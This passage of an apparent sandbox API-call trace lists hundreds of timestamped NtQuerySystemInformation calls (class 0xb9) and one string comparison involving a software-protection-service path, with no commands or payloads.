NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd360, Length=0x28, ResultLength=0x0) [0207.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0207.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0207.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd340, Length=0x20, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd340, Length=0x20, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x28, ResultLength=0x0) [0207.931] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0207.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd360, Length=0x28, ResultLength=0x0) [0207.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0207.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0207.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd340, Length=0x20, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd340, Length=0x20, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x50, ResultLength=0x0) [0207.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x50, ResultLength=0x0) [0207.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x50, ResultLength=0x0) [0207.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0207.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0207.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0207.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0207.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0207.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0207.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0207.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0207.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0207.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce80, Length=0x28, ResultLength=0x0) [0207.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0207.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0207.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0207.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0207.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd20, Length=0x20, ResultLength=0x0) [0207.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd20, Length=0x20, ResultLength=0x0) [0207.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd20, Length=0x20, ResultLength=0x0) [0207.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce60, Length=0x20, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x50, ResultLength=0x0) [0207.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x50, ResultLength=0x0) [0207.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x50, ResultLength=0x0) [0207.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0207.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0207.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0207.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x50, ResultLength=0x0) [0207.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0207.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0207.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0207.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0207.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x28, ResultLength=0x0) [0207.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce80, Length=0x28, ResultLength=0x0) [0207.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0207.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0207.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0207.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0207.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd20, Length=0x20, ResultLength=0x0) [0208.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd20, Length=0x20, ResultLength=0x0) [0208.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd20, Length=0x20, ResultLength=0x0) [0208.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0208.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x38, ResultLength=0x0) [0208.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce60, Length=0x20, ResultLength=0x0) [0208.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0208.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0208.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.036] NtQuerySystemInformation 